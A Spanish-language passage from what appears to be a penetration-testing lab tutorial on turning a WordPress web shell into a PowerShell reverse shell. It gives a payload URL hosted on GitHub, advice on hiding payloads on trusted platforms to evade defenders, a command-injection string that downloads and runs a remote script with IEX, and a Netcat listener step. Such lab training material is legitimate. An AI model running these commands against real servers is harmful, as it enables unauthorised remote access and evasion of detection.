soapMigracion de WebShell hacia RevShell utilizando PowerShell

Los APT suelen almacenar sus reverse Shell o virus en plataformas digitales clasificadas como seguras y de esta manera evitar la detección por parte de los blue team; ya que el tráfico saliente estaría apuntando hacia recursos conocidos como confiables.

Nosotros almacenamos nuestra Shell inversa en powershell en GitHub:

https://raw.githubusercontent.com/Spartan-Cybersecurity/CPPJ/main/PowerCPPJ.ps1arrow-up-right

Vamos a descargarla en el servidor de WordPress:

Y posteriormente, ejecutamos el siguiente comando sobre el formulario web vulnerable:

&powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://172.16.1.12/wordpress/PowerCPPJ.ps1')"arrow-up-right

Antes de la ejecución, vamos a iniciar una escucha con Netcat teniendo en cuenta lo alojado en la Shell inversa que se encuentra en GitHub.

Felicidades, has logrado hackear los 4 servidores web que tenían IP públicas.

Last updated